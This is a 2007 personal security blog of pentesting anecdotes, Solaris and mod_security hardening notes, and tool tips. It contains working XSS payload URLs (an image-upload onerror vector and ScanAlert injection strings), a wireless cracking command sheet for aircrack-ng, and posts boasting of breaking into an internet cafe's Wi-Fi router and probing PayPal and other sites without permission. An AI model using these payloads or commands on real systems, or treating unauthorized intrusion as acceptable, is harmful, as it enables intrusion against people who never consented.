Sunday, December 2, 2007

.NET ViewState vulnerable to manipulation exploits

This past week i had a chance to audit a customer who is using microsoft's viewstate. So what is ViewState and why is it vulnerable? Well, ViewState is an ASP.NET feature that allows you to persist form properties when a page posts back to itself. ASP.NET takes the current state of all form controls and stores them as an encoded string in a hidden form field. The risk of View State is that an attacker might be able to view or modify these form values to accomplish a variety of attacks. So, the question is how do you modify and view the values in ViewState? To do so, you can download PortSwigger's latest burp proxy to accomplish the task of neccessary manipulation. View State appears in the HTML source as a hidden form field and it is using base64 encoding.



The latest version of burp proxy allows you to decode ViewState's base64 algorithm and view the clear contents inside, or you can also download ViewState decoder from Fritz Onion to ONLY view the contents inside. Check out the both links below:

http://www.dotnetspider.com/tools/ShowTool.aspx?ToolId=378
http://blog.portswigger.net/2007/06/viewstate-snooping.html

Because the customer is using some sort of VPN, i was unable to use PortSwigger's burp proxy for what ever reason. However, i managed to decode the ViewState using Viewstate Decoder.



To prevent attackers from manipulating View State, you can include a message authentication code (MAC). A MAC is essentially a hash of the data that ensures its integrity. You can enable the View State MAC on the machine, application, or page level. You can enable the MAC wherever you enable View State with this attribute:
enableViewStateMac="true"

To truly make sure ViewState is secured, you will need to encrypt the data with ViewStateEncryptionMode property set to true. This will prevent attackers from decoding and viewing data inside viewstate. To read more about ViewState security, check out the msdn link below:

http://msdn2.microsoft.com/en-us/library/ms178199.aspx
http://msdn.microsoft.com/msdnmag/issues/03/02/CuttingEdge/

The Hacka Man

Sunday, November 25, 2007

Old School Oracle Auditing

I was again reading for hacking articles and one of the article "Simple Oracle Auditing" caught my attention. Well, its an old article but its still fun to read and learn from the gurus. Check it out guys: http://www.securityfocus.com/infocus/1689

The Hacka Man

Thursday, November 22, 2007

7 steps to better Solaris Network Settings

I was auditing one of our customer again and this time round, i managed to come up with a 7 step guide to better secure the TCP stack for Solaris. Well, you guys can add on for more.

1. Configure for more random TCP sequence number generation. Check that in(/etc/default/inetinit), the TCP_STRONG_ISS is set to 2. For instance, TCP_STRONG_ISS=2

2. IP forwarding is to be turned off to prevent the machine acting as a router. To disable IP forwarding, a file "/etc/notrouter" need to be present. If the file is missing, issue the following command to create one : touch /etc/notrouter

To prevent dynamic routes updates via the network, move "in.routed" and "in.rdisc" away from "/usr/sbin" directory by perform the following commands :
mv /usr/sbin/in.routed /export/home/cfgh/base
mv /usr/sbin/in.rdisc /export/home/cfgh/base

3. Change default kernel IP settings for better security. Following the following steps to change the kernel IP defaults values :

Setup files and environment:
touch /etc/init.d/exconfig
ln -s /etc/init.d/exconfig /etc/rc2.d/S70exconfig
chmod 744 /etc/init.d/exconfig /etc/rc2.d/S70exconfig

Edit file "/etc/init.d/exconfig" and add the following lines:
#!/bin/sh
# /etc/init.d/exconfig
RELEASE=`/usr/bin/uname -r`
release7 ()
{
/usr/sbin/ex -set /dev/ip ip_forwarding 0
/usr/sbin/ex -set /dev/ip ip_strict_dst_multihoming 1
/usr/sbin/ex -set /dev/ip ip_send_redirects 0
/usr/sbin/ex -set /dev/ip ip_ignore_redirect 1
/usr/sbin/ex -set /dev/ip ip_forward_src_routed 0
/usr/sbin/ex -set /dev/ip ip_forward_directed_broadcasts 0
/usr/sbin/ex -set /dev/ip ip_respond_to_echo_broadcast 0
/usr/sbin/ex -set /dev/tcp tcp_conn_req_max_q0 4096
/usr/sbin/ex -set /dev/tcp tcp_ip_abort_cinterval 60000
/usr/sbin/ex -set /dev/ip ip_respond_to_timestamp 0
/usr/sbin/ex -set /dev/ip ip_respond_to_timestamp_broadcast 0
/usr/sbin/ex -set /dev/ip ip_respond_to_address_mask_broadcast 0
/usr/sbin/ex -set /dev/arp arp_cleanup_interval 60000
id -a mqm > /dev/null 2>&1
if [ \$? -eq 0 ]
then
/usr/sbin/ex -set /dev/tcp tcp_keepalive_interval 600000
fi
}
release8 ()
{
/usr/sbin/ex -set /dev/ip ip6_forwarding 0
/usr/sbin/ex -set /dev/ip ip6_strict_dst_multihoming 1
/usr/sbin/ex -set /dev/ip ip6_send_redirects 0
/usr/sbin/ex -set /dev/ip ip6_ignore_redirect 1
/usr/sbin/ex -set /dev/ip ip6_forward_src_routed 0
/usr/sbin/ex -set /dev/ip ip_ire_arp_interval 60000
}
release6 ()
{
/usr/sbin/ex -set /dev/ip ip_respond_to_echo_broadcast 0
/usr/sbin/ex -set /dev/ip ip_forward_directed_broadcasts 0
/usr/sbin/ex -set /dev/ip ip_strict_dst_multihoming 1
/usr/sbin/ex -set /dev/ip ip_ignore_redirect 1
/usr/sbin/ex -set /dev/ip ip_forward_src_routed 0
}

if [ \$RELEASE = "5.7" ]
then
release7
elif [ \$RELEASE = "5.8" ] || [ \$RELEASE = "5.10" ] || [ \$RELEASE = "5.9" ]
then
release7
release8
elif [ \$RELEASE = "5.6" ]
then
release6
fi

4. Disable multicast from the server, edit the file "/etc/rc2.d/S72inetsvc" and comment out/remove the following lines :
#(
#if [ "$_INIT_NET_STRATEGY" = "dhcp" ]; then
# mcastif=`/sbin/dhcpinfo Yiaddr` || mcastif=$_INIT_UTS_NODENAME
#else
# mcastif=$_INIT_UTS_NODENAME
#fi
#
#echo "Setting default Ipv4 interface for multicase:" \
# "add net 224.0/4: gateway $mcastif
#
#/usr/sbin/route -n add -interface "224.0/4" "$mcastif" >/dev/null
#)&

For Solaris 10
Multicast would be disabled using /etc/rc2.d/S72inetsvc-os10

5. Denial of Service Prevention System Settings.
Services that must be disabled on all servers, unless required by business function from /etc/services. Services include: ftp-data ftp tftp pop2 pop3 pop-2 nntp chargen daytime discard echo finger talk who whois new-rwho klogin eklogin telnet systat netstat time

6. Prevent "core dump" generated by inetd as it may contain login information. This could be achieved by editing the file "/etc/rc2.d/S72inetsvc". Change the line :
/usr/sbin/inetd -s &
to /usr/bin/ulimit -c 0; /usr/sbin/inetd -s -t &
Note :
ulimit -c 0 : set the core file size to 0 byte
inetd -s -t : stand-alone server with tracing of all tcp connections

For Solaris 10
Create the script /etc/rc2.d/S72inetsvc-os10 as per below.
#cat /etc/rc2.d/S72inetsvc-os10
IPADDR=`netstat -nr | grep -w 224.0.0.0 | awk '{print $2}'`
/usr/sbin/route -n delete -interface "224.0/4" $IPADDR
/usr/sbin/svcadm enable inetd
/usr/sbin/inetadm -M tcp_trace=TRUE
#chmod 555 /etc/rc2.d/S72inetsvc-os10

7. .netrc files System Settings (.netrc files, .netrc files in root’s home directory). Files are not permitted, remove the files if any, issue command find / -name .netrc -print

The Hacka Man

Wednesday, November 21, 2007

Hacking Iphone the fun way

I got my iphone and i know there are exploits and vulnerabilities in it discovered by H.D Moore, creator of metasploit. However i wasn't too enthusiastic about the damage that this exploit can do but more into the fun aspect aspect of how to install new 3rd party application in phone. I know that you can install hacking tools too, but thats not my goal. Why install those tools when you can install it in the PC? Anyway, I managed to unlock the phone with a few help and of course start using it. It is the coolest phone out on the planet and of course with the video below, i managed to install more applications in my phone. Check it out.



The Hacka Man

Tuesday, November 20, 2007

Hacking SCADA

While i was in Dubai, i got a chance to visit one of our customers who was using SCADA. Back then, it was so new to me and i have no idea of how to actually audit it. Back here in Singapore, i got another chance to actually test and audit SCADA systems and this time round, i found a way to actually break the application and network apart. However, i have to be very careful during the audit, as one wrong move may affect the whole of Singapore.

So what is SCADA? SCADA stands for Supervisory Control and Data Acquisition and they are the systems that deliver water, power supply, gas and some other items to your home. Check out http://en.wikipedia.org/wiki/SCADA if you would love to read more about it. There had been incidents where SCADA systems had been hacked and information was stolen by terrorist. Also, internet worms like the Slammer worm also affected the systems and cause a total DoS. Why is all these happening? All i can say is either because those systems are exposed to the internet or they are using proprietary protocols and they think that they are safe from hackers and doesnt care about it. Those people working in SCADA are so wrong, they doesnt bother about security at all, and i guess its because something disturbing might have happen and only then they start to panic and need people like us to audit their systems.

SCADA uses their own proprietary protocols like DNP3, OPC, Modbus, DCS, etc, and its possible to use Wireshark to actually monitor the traffic and see how the handshaking process work. By observing the handshake, i realised that it was possible to perform man in the middle attacks, but of course would require developing of some tools to perform the job. Some other attacks that are possible include DoS, capturing of username and password, injecting worms and virus and many other old school techniques.

The problems with SCADA:
1. Windows & Linux Vulnerabilities
2. Not patched regularly – maximum uptime needed
3. Denial of Service Attack
4. Continuous string of reboot command
5. No Authentication
6. No Accounting
7. Traffic sent in clear text (username & password)
8. No encryption

To Pentest on SCADA systems, you can do the following:
1. Port Scanning
2. OS Fingerprinting
3. Vulnerability Scanning
4. Exploitation
5. Credentials Guessing
6. Sniffing
7. Fuzzing

Of course there are many other possibilities for pentesting SCADA systems. I for sure want another session with SCADA because it is so fun having to touch on mission critical systems that can affect the whole country. There are tons and tons of possibilities and problems with SCADA and i have just outline a few obvious ones. Of course, you got to be in the SCADA environment if you actually want to discover more possibilities, but then again, do we have such chances everyday?

The Hacka Man

Monday, November 19, 2007

Two factor authentication bypassed

It had been a long fortnight and i have not finished writing my report for various banks. It was really that much report to write and especially for one specific particular bank. I managed to bypass the security control mechanism setup by this bank and steal the username and password of any user.

Most of the banks here in Singapore practised two factor authentication and for most people, they think that it is secure because of the extra added security. However, a PoC was released to the bank depicting to them that it was possible to bypass the security control mechanism and it was possible to capture the username and password of any user. I am sorry guys, i am not supposed to leak out any information here. It is very sensitive from the bank's point of view. The best part of the exploit was there was no XSS or sql injection or any sorts of vulnerability that facilitate this exploit. It was purely just information gathered during the passive information gathering exercise.

I was browsing their site and i discovered a section where some information could help me facilitate the research of writing the exploit. I had an albeit pedantic thought when i saw that particular section. I was thinking that with all that information, i am definitely able to bypass the security mechanism. However to do that, i would require someone else to write the code for me with my ideas. Nevertheless, within a week, i managed to come out with a PoC and display a great deal of demostration. Guys, i know you want to know the details, but i simply can't reveal anything because of the Non Disclosure Agreement I signed. All i can say is passive information gathering is a very important exercise when trying to attack huge organizaton and guys can spend hours and days writing a cool exploit, with me, all i need is total observation and i got the results i want with ease. Why bother to go all the way to do something difficult when something easy can be accomplished faster??

I would love to attach a screenshot of what i managed to captured, but then again, it is too sensitive. I am sorry, but just know that it is possible to bypass 2FA.

The Hacka Man

Saturday, November 17, 2007

Image upload xss

Also, i stumble across an old blog post by rsnake where it was possible to execute XSS on an upload function.

http://ha.ckers.org/blog/20070603/image-upload-xss/

http://pstgroup.blogspot.com/2007/06/tipsimage-upload-xss.html

an example of something you might test for:



So you upload this file:

http://ha.ckers.org/image-xss/"onerror="alert('XSS')"a=".jpg

This ends up making the page look like:



The Hacka Man

DOM Based XSS

I was reading Amit Klein's 2005 article on DOM Based XSS and he actually mentioned a few things to look out for in DOM XSS. In that article, he gave us an insight look of how to look for potential XSS in the DOM and why sanitizing is important on the client side.

The full article is here: http://www.webappsec.org/projects/articles/071105.html

Below is a snippet:

2. Analyzing and hardening the client side (Javascript) code. Reference to DOM objects that may be influenced by the user (attacker) should be inspected, including (but not limited to):

document.URL
document.URLUnencoded
document.location (and many of its properties)
document.referrer
window.location (and many of its properties)
Note that a document object property or a window object property may be referenced syntactically in many ways - explicitly (e.g. window.location), implicitly (e.g. location), or via obtaining a handle to a window and using it (e.g. handle_to_some_window.location).

Special attention should be given to scenarios wherein the DOM is modified, either explicitly or potentially, either via raw access to the HTML or via access to the DOM itself, e.g. (by no means an exhaustive list, there are probably various browser extensions):

Write raw HTML, e.g.:
document.write(…)
document.writeln(…)
document.body.innerHtml=…
Directly modifying the DOM (including DHTML events), e.g.:
document.forms[0].action=… (and various other collections)
document.attachEvent(…)
document.create…(…)
document.execCommand(…)
document.body. … (accessing the DOM through the body object)
window.attachEvent(…)
Replacing the document URL, e.g.:
document.location=… (and assigning to location’s href, host and hostname)
document.location.hostname=…
document.location.replace(…)
document.location.assign(…)
document.URL=…
window.navigate(…)
Opening/modifying a window, e.g.:
document.open(…)
window.open(…)
window.location.href=… (and assigning to location’s href, host and hostname)
Directly executing script, e.g.:
eval(…)
window.execScript(…)
window.setInterval(…)
window.setTimeout(…)

The Hacka Man

Friday, November 16, 2007

Deadly execution in huge Financial Company

I was auditing one of the biggest financial company in the world and here in the Singapore branch, it was just really bad. I was playing around with the software and noticed an uploading function. With evil thoughts in my mind, i quickly wanted to see if this application does allow uploading of exe, bat or some other executable files. To my wildest surprise, it does allow the uploading of exe files and i tell you, i could upload any sorts of trojan or virus and execute it on the client's pc. I actually did upload an exe program and tried execute it on the client's pc and it did execute the program accordingly and smoothly with no protection on the client's pc. It was really just bad. Moreover, the application itself also does allow command execution on the querystring which was really an eye opener. It was just a lucky day with my audit and an unlucky day for the customer. Report had been submitted and lets hope they will rectify the problem to avoid any attacks.

Check out for my next post on Two Factor Authentication Man in the Middle attack PoC

The Hacka Man

Thursday, November 15, 2007

Basics of Mod_Security

This past week, i was auditing a customer's web server defence against web attacks and i realised that he did not install mod_security as one of their modules in the server. Well, considering it is a huge customer, they should at least do some basic filtering using mod_security since their servers are running on linux. I had mentioned about mod_security in my previous post and for those who are still not sure what it is, mod_security is a web application firewall that is an Apache Web Server add-on module that provides intrusion detection, content filtering, and web-based attack protection. It is good at detecting and stopping many known web attacks, such as many SQL injection type attacks, cross-site scripting, directory traversal type attacks, and many others. Below is a snippet of a simple basic mod_security configuration:


# Turn the filtering engine On or Off
SecFilterEngine On

# Make sure that URL encoding is valid
SecFilterCheckURLEncoding On

# Unicode encoding check
SecFilterCheckUnicodeEncoding On

# Only allow bytes from this range
SecFilterForceByteRange 0 255

# Only log actionable requests
SecAuditEngine RelevantOnly

# The name of the audit log file
SecAuditLog /var/log/apache2/audit_log

# Debug level set to a minimum
SecFilterDebugLog /var/log/apache2/modsec_debug_log
SecFilterDebugLevel 2

# Should mod_security inspect POST payloads
SecFilterScanPOST On

# By default log and deny suspicious requests
# with HTTP status 500
SecFilterDefaultAction "deny,log,status:500"

# Add custom secfilter rules here


Of course, you can add on more items and it depends on what you need it to filter and protect. Mod_Security does come with a performance cost, however, the security benefits far outweight the performance cost. Do consider using it.

The Hacka Man

No hacking activites

Been really busy with all the results i got from my projects and pretty occupied with report writing. I am handling a few projects currently and well, there ain't anytime for me to research or perform any sorta testing or hacking. This is good in the sense that it keeps me busy and at least i feel "useful" to my company in the sense that i am performing audits for our customers during this peak period. I will definitely resume back to the hacking mode soon and check out for more cool ill street hacking. As of blogging now, i am still writing long unfinished reports. Reports are piling up if i don't start doing it. Till then, stay tuned for my next installment.

The Hacka Man

Monday, November 5, 2007

SAP hacking Oracle?????

This is one of the biggest news i had ever heard of, SAP hacking ORACLE. That is totally shocking but at the same time funny. Big organizations are fighting and competiting for each other to secure their position in the software market. I am for once happy that SAP got into trouble. Well, the news are spreading like fire over the internet. Check out 2 of the sites below, and of course you can google for more.

http://www.theinquirer.net/en/inquirer/news/2007/07/03/red-faced-sap-admits-hacking-oracle

http://blogs.zdnet.com/threatchaos/?p=450



The Hacka Man

Friday, November 2, 2007

keygen.us XSS

I was again playing around with XSS and this time on one of the biggest cracking site which is keygen.us. Well, i tried some basic XSS and it didn't work as they did some input validation and escape my input characters. It got me pumped up and wanted an XSS on their site. In the end, with a few help i managed to get an XSS on their site and one of them includes mario's exploit. It was an overall learning experience for me and an exiciting one. Check it out:






The Hacka Man

Thursday, November 1, 2007

Paypal CRMgateway XSS

Paypal used to suffer from a lot from phishing attacks in the past and i bet even today, the bad guys are finding ways to exploit this hole to get more money. I was again playing around and i managed to find a XSS hole in paypal's crmgateway. Well, it seems like paypal never learn their lesson in the past and still allows for injections. Anyway, i had already cancelled my account with paypal because of their bad service and unforgivable mistake they made. Good luck paypal.



The Hacka Man

Hacking and Cracking Wireless

One day after intruding into the router, i remembered my colleague Mark compiled a list of Aircrack-ng commands for cracking and injection. He was doing a wireless project and managed to capture the commands needed when doing the pentest. Check it out. This is a summarized version of the Aircrack-ng commands and it comes in very handy when doing a wireless audit and save you the time needed to read manuals. Use it in your next wireless audit. Thank you Mark for the compilation and your effort.


--------------------------------------------------------------------

install madwifi-ng driver (done! monitor mode working)
install rt73 driver for dlink usb (done! monitor mode working)
install rtutilt for rausb0 configuration
install aircrack-ng (done dev version from svn)



Steps:

#####################################################
CONFIGURATION:

D-Link DWL-G122

ifconfig rausb0 up
iwpriv rausb0 forceprism 1
iwpriv rausb0 rfmontx 1
iwconfig rausb0 mode monitor OR
airmon-ng start rausb0 channel


NetGear WG511T

wlanconfig ath0 destroy
wlanconfig ath0 create wlandev wifi0 wlanmode monitor

specify channel
iwocnfig ath0 channel n
########################################################

CHANGING MAC ADDRESS

ifconfig ath0 down
ifconfig ath0 hw ether
ifconfig ath0 up

use macchanger instead

#########################################################

INJECTION TESTING

NetGear WG511T
aireplay-ng -9
===================
D-Lnk DWL G122

aireplay-ng -9 (if this doesn't work it means no ap on same channel found)
Try card-to-card injection below:
====================

Card-To-Card Injection:
Make sure they are on same channel using (channel hopping does not work on D-Link DWL G122???)
iwlist channel (to find out the current channel set)

aireplay-ng -9 -i ath0 rausb0 (ath0 will mimic an access point)
aireplay-ng -9 -i rausb0 ath0 (rausb0 will mimic an access point)
=====================



########################################################




PACKET CAPTURE:

airodump-ng device (find out first the interested bssid and channel)

Then capture packets on that particular channel:

airodump-ng --channel --bssid -w dumpfile device(ath0/rausb0

Notes: capture full packets when using PTW attack (don't dump ivs only)

MERGING capture files (RESUMING)

mergecap -w out.cap test1.cap test2.cap test3.cap

FOR IVS

use ivstools



############################################################

ATTACKS

You may want to associate to ap first using fakeauth before any test
aireplay-ng --fakeauth=0 -e SSID -a 00:1a:6d:f8:40:d0 -h 06:14:6c:4c:b9:7c ath0

Automatic Association:
ireplay-ng -1 6000 -o 1 -q 10 -e SSID -a 00:1A:6D:F8:40:D0 -h 06:14:6C:4C:B9:7C ath0




ARP replay (for wep cracking PTW method):
if RXQ in airodump window is > 90 then #/s = 200+ (watch for #Data, it contains IV)

aireplay-ng --arpreplay -b -h device

Deauthentication (to capture WPA handshake, reveal hidden SSID)
Fake Authentication (to authenticate to AP in case needed before we can inject)



#############################################################
WEP CRACKING

Using PTW attack (version 0.9+ only) Packets must be ARP (from arp-replay)

aircrack-ng -z -b dumpfile*.cap
40-bit = 20,000
104-bit = 40,000

Normal Attack
-n 64 (test if 40-bin WEP) remove -n for 104-bit (default)
aircrack-ng -n 64 -a 1 capturefile




#########################################################

RESOLVE MAC Address to IP Address

use netdiscover or ARP tools

##########################################################

Determine the frequency on a particular channel
http://www.rflinx.com/help/calculations/#2.4ghz_wifi_channels then select "Wifi Channel Selection and Channel Overlap" tab.


#######################################################

Increasing injection Speed

iwconfig device rate 11M


#####################################################


---------------------------------------------------------------------------


The Hacka Man

Wednesday, October 31, 2007

Hacked into a Wireless Router.

These days, i am just mad crazy. Hacking, hacking and still hacking. Basically i am dead boring and decide to see how far can i go with my hacking skills. Today, after finishing auditing a customer, i wanted to check my email as i need to send out an urgent email. I saw an internet cafe with Wifi connection, however there was encryption on. Within a few minutes, i managed to crack their password and hacked straight into their router. With that, i managed to use bit torrent to do port forwarding and download my favourite tv show. Well, it wasn't as thrilling as the first time i hacked into a wireless router, but still, it was a hack. How i do it? Just by observation and some trial and error and there you go.



The Hacka Man

Web Application Security with Joe Walker

This is a great slideshare from Joe Walker with all the new hacking techniques that involves with ajax and Web2.0. Its content is simple yet very entertaining and easily understandable. Check it out guys,



http://getahead.org/blog/joe/

The Hacka Man

Free Audit, Is it Real??

Ok, i am providing free audits for those who need my help in assisting them to secure their applications or networks and read properly, i am NOT charging a single cent for my effort of work in helping you. The reason for doing so is because i am giving back to the community that once helped me in getting where i am today. I remembered i was hacking like nobody business back in the days with trojans, port scanning, exploits, etc..I was very young then and indeed very enthusiastic in all sorts of hacking. Today, because of the busy work schedule and commitments i have, i tend to have lesser time in reading or researching. However, i am still pretty much involved in the security community when in comes to networking and web applications. There are actually quite a number of people who approached me for free auditing of their public facing web applications and i actually managed test their site and show them what i had found. Of course, i cannot reveal any of those clients i did before, but trust me, some of them are huge organization and of course some are my friends.

To get a free audit, i need the following details:

1. Prove that you are the owner of the site or network.

2. Personal details of yourself.

3. If you are from a company, use your company's email to send me an email and follow up with a call to my mobile.

4. If you are an individual, i would require you to give me a call to my mobile or skype. Send me an email first at hackathology@gmail.com

5. If there should be any meetup, prepare a Non Diclosure Agreement for signing if required and discuss for the Scope Of Work.

I cannot guarantee i have the time to test and deliver on time for each and every customer if the request traffic is high, however, i will do my best to deliver you of what i promised. Also, if the scope gets larger, then the amount of delay will be longer, it all depends. Don't forget i have a day time job and doing a favour for you. Lastly, should there be any changes based on the audit details, i will update it here on my blog.

The Hacka Man

Tuesday, October 30, 2007

Detecting BroadVision Applications. Are they secure?

Are proprietary applications secure? Well, i guess yes and no. Security researchers are constantly researching for flaws in those applications and only if a bug is reported, will only then the company take actions to secure their loopholes. I am currently auditing a BroadVision application and what a surprised i got from my results. I am not supposed to reveal anything, but i let me tell you, for a critical application like this, i am not sure if the customer is using an old version of BroadVision or it was simply not check for sanitization. I could basically do pretty much i want from that application and create a havoc. Too bad, i cant show anything here but trust me, if you guys got a chance to audit a BroadVision application, you will be surprised with the kind of flaws you find. Its basically like opening a can of worms, waiting for someone to feed on it.

Well, at first i wasn't sure it was a BroadVision application, however after some researching on observation on the HTTP headers, this is what i got:

POST http://example.com/bvsn/bvcom/en/server/whereto.jsp?BV_SessionID=NNNN1809204881.10923774158NNNN&BV_EngineID=nnndaoplghjkiihcfklcfkmdgohdgih.0&BV_UseBVCookie=yes HTTP/1.0

The killer signature here is the parameter names of BV_SessionID and BV_ EngineID. If you see these anywhere in a URL or on a http header, you have more or less nailed down a BroadVision Application. Of course there are some other parameters like checking for .do extention, however that wasn't seen during the audit. Google for those highlighted in bold and you will see what i mean. I am now signing off here and back for another round of audit. I am going to pretty much cripple the whole application this time round.

The Hacka Man

Monday, October 29, 2007

Injection Vectors, Are you up for it?

Recently, i had been doing a lot of web penetration test and i realised that most of them suffers from injection flaws. Well, some can be deadly and some were just pretty minor. Well, it doesnt matter whether how severe the injection point is, if your site can be injected, it means that there are still some sanatizing and input validation work which still need to be followed up. Whenever i perform a penetration test on huge organization, scanners are always deemed useless and i have to do it manually with some form of checks i have on a list. Well, i managed to download a list of injection vectors from my friend Andres and that certainly helped me save time on googling for attack vectors. For those who do web penetration test, this will be very useful which will save your hours and hours looking, reading or searching around for information.

****************Start of the injection list*********************************















*****************************END*****************************************************

The Hacka Man

Sunday, October 28, 2007

An Important Lesson, Passive Enumeration with Paterva

I am about to assigned to a very exciting project and one of the most important elements of hacking is passive enumeration. I mean to bring down an organization or their networks, passive enumeration is definitely a must! This weekend i was scouring around for effective tools that would allow me to perform my search much faster and in a more logical and graphical manner and i happen to stumble on a site called Paterva. This is a wonderful toy for passive enumeration. You can basically search for a person, DNSName, Website, Email, etc and it will return you with results of what a person had visited, the sites he visted, the words he used, etc. Of course instead of searching for a person, you can also perform searches for organization. I know people are going to say that this can also be done in google dorking. Well, thats absolutely true, google dorking is so much powerful with more explosive results. However, not everyone is an expert in that area and i mean this is only the surface of passive enumeration. To excel deeper, you would of course require certain skills like google dorking to do so. I am pretty much happy with Paterva because of its simplicity and the ability to produce results in a more systematic manner. Try it for yourself.

http://maltego1.paterva.com/maltego-classic.html

http://www.paterva.com/web/Maltego



The Hacka Man

Friday, October 26, 2007

Citrix Hacking

Few weeks ago, pdp released an article about citrix hacking and it actually caught my attention. I read through a total of 4 pdp's posts and also wirepair's whitepaper on hackingcitrix. It was overall a basic yet interesting article and actually gave me an idea on how to start enumeration and hacking citrix. Well, for my next trick when i am about to audit citrix soon, i will start employing the techniques that was discussed in the article and also include one of my favourite tricks of all time that would actually find flaws in the Citrix application. This would actually test how robust is the citrix application and how can it handle certain payloads. Since Citrix is not taking security seriously according to wirepair's article, i would not hestitate to publish any flaws i find. With that being said, of course i would give them a chance to see how is their response.

The Hacka Man

Thursday, October 25, 2007

Checkpwd 2.00 A12 released

Alexander Kornbrust of red database security just released the much anticipated checkpwd oracle cracking tool. This release has much improvement over the previous releases. Some of those include:

* support for Oracle 11g passwords
* support for APEX passwords (1.4-3.0.1)
* collect passwords from the database
* collect password candidates from the database
* option not to display the oracle password in command line
* crack passwords from the password history
* crack role passwords
* save checkpwd default configuration in a configuration file
* read username and password hashes from a file

Well, personally i had tried the version 1.21 months ago and it wasn't bad after all. And now comes version 2? You bet, it will be so much interesting to test out the new features and see how the tool produce the results. Weeks ago, THC, a german underground hacking community released oracle 11g password cracker and i must admit that i haven't tried it yet, but now Alex had incorporated checkpwd 2.00 with oracle database 11g password cracking abilities.

For those who don't know, Alex is a world renowned oracle security expert. He is constantly reporting oracle bugs to Oracle and had published a lot of whitepapers and giving talks at conferences regarding oracle security. I had met him once in Dubai and i must say he is a humble and patient person with amazing oracle security knowledge. To find out more, check him out at the following links

http://www.red-database-security.com

http://blog.red-database-security.com

The Hacka Man

Sunday, October 21, 2007

Results from Hacking a huge organization

The other night i was auditing one of the customers here in Singapore. It was a huge organization with massive workforce and manpower. Normally huge organization tend to give people an impression that they must be secure because either they have enough internal people to do the patching or they must be doing some kind of upgrading work every now and then to have their servers or networks compliance with the government authority.

The results from my audit depicted that life isn't a bed of roses. Multiple servers suffers from DoS, buffer overflows and one of them even allows me to escalate to admin priveleges. Well, the results were really astonishing from such a reputable organization and everything was under my control. Of course, i managed to capture all screenshots of what i did and wrote a report to the management. I am wondering what they will do about it. They could either pray hard that no one attack them and start patching or expect for the worst where they could be brought down anytime anyday.

One of the coolest thing i did during the audit was defacement of their website. Personally, i had never deface a website before till that day. It was great seeing big organization websites having your own selected message or picture, definitely tarnishing their reputation and the feeling was just too estatic. Of course, i had to wrap it up fast by taking a screenshot of it and resume their site back to normal or i will be screwed. The one last thing i observed and found out was they were using a very old Operating System where most of their crucial data was residing. It was exhilarating as i was poking my way to grab all their private data. All in all, it was just bad, really bad. I am about to finish the report and i send it to the customer. I just want to see what is the response going to be.

The Hacka Man

Saturday, October 20, 2007

Short update on audit

For those of you guys who are waiting for the result of the audit, because of the things i found and the sheer volume of report writing i am doing, i will only update the findings next week when i finish the report. Sorry for the wait, but thanks for the understanding.

The Hacka Man

Thursday, October 18, 2007

e... singapore, re-evaluate your website!

Well, i am roughly around 10 mins before i start audit, but anyway, i would love to talk about e... singapore. Heard quite a few bad things about e... singapore and i remembered while i was at Dubai, i was asking them for a job, but in the end, they void my application. Back in Singapore, my colleagues were just talking about security companies in Singapore and they mentioned e.... I have no grudges against e..., but frankly speaking, as a MSS and now trying to expand their business into the IS field, i am issuing a challenge against them. By just browsing their websites, i am pretty sure that they can be Own3d! From my guess, they could be easily using IIS 5 or 6 and for this i can be sure by just testing one of their functions, without scanning their website. As for owning them, i pretty sure they tightened up most of the holes, EXCEPT for one. All in all, if they want to step into the the IS field, the first step would be to tighten their own holes first, or else how could they convince people that they are doing IS when they own site is at risk????? e..., get your internal auditors to re-evaluate the e... website or get me at NO cost to help you do the job.

The Hacka Man

ScanAlert, Hacker Safe?


Yesterday, i heard from my colleagues that we would be joining forces with ScanAlert and i was really puzzled with the move. I was asking myself that if ScanAlert is really Hacker Safe? Are they really that good with their scanners? Did they use open source scanners and customized it to their own? Are those clients they have really safe from hackers? Can i say that if i use ScanAlert service to scan my website or network, i will be safe from hackers? There are a lot of questions in my head and i think ScanAlert has a good way of doing marketing. They make every customer insert their logo onto their own site which provide more visibility of ScanAlert's Service. Well, it is a good from a company point of view because they are recognized and make money out of it, however, that doesnt mean that by using their service, i will be free from attackers. Not long ago, i remember members of sla.ckers.org posted XSS vulnerabilities on their site. So can i say that if i can find XSS on their site, their scanners are shitty and they are still hackers safe? I don't know, just my 2 cents worth. Anyway, i managed to digg out the XSS vector that was injected at their site sometime ago, however, they already patched it.

https://www.scanalert.com/SignUp.sa?act=step1&oc=%27%29return+0%3B%7Dalert%280%29%3Bfunction+blah%28%29%7Bif+%280%29%7B%2F%2F

https://www.scanalert.com/SignUp.sa?adds106=2&act=step3&company.name=touchme%22%20onmouseover=%22alert('Hacker%20Safe?');%22

The Hacka Man

Friday, October 12, 2007

XSS-Proxy PoC

The other day, i was thinking about how can i actually get more sales during a meeting session with customers and with the current bloom of hacking websites, i thought its time to actually show customers of what i can do and the impact of a XSS vulnerability. I referred to the book "XSS Exploit and Defence" by Jeremiah and Rsnake and i decided to go with a tool called the XSS-Proxy. All i can say is this tool is really light and easy to use. All you need is just perl and a webserver to be running on your machine and one would have to just launch the listener from there on with the command "perl XSS-Proxy-shmoo_0_0_11" in the command prompt. Anton Rager actually spend some time with me explaining to me how this tool works and the impact of an XSS. I would like to thank him here for his time and effort. If those of you guys who would love to try this tool, download it at http://xss-proxy.sourceforge.net. There is also Advanced XSS attacks and a mini whitepaper for further knowledge reading.

First to startup xss-proxy:


Then inject a script tag into the victim page, be it persistent or reflected, try it to realised it.


The admin page contains the links that the victim had visited, and by clicking those links, you can choose to redirect and hijack the victim browser under the same document domain


A sample of the redirect attack. Observe the below grey bar with "Opening page.."
This is achieved through by clicking on the admin page on one of the links the victim had visited and i wanted the victim to visit another page, so i choose the link i wanted the victim to visit and click on it. On the victim side, he will automatically be redirected to the page i chosed.


And finally, i can even proxy javascript injection on the victim browser. A simple one would be alert('XSS');


The Hacka Man

Wednesday, October 10, 2007

AppCodeScan beta Released

Few minutes ago, Shreeraj just updated me with the release of a new tool from Blueinfy. This tool basically check your source code for potential entry points for xss, sql injection, poor validation etc. Well, personally i had not tested the tool due to time constraints and my busy schedule. I would strongly recommend anyone who has the time to actually download the tool and give it a try and its free anyway. The tool is called AppCodeScan and for those who had already tried the tool, feel free to let me know as trust me, i am really eager to try on this. Also, check out Fortify's source code scanning tool which has similar functions and usage. The only difference is maybe the support and its an enterprise tool. At the same time, do check out their cost and you know why Shreeraj is so generous to make it free. Of course, you can customize the ruleset to suit your application if you know how to. Thank you Shreeraj.

http://blueinfy.com/tools.html

The Hacka Man

Monday, October 8, 2007
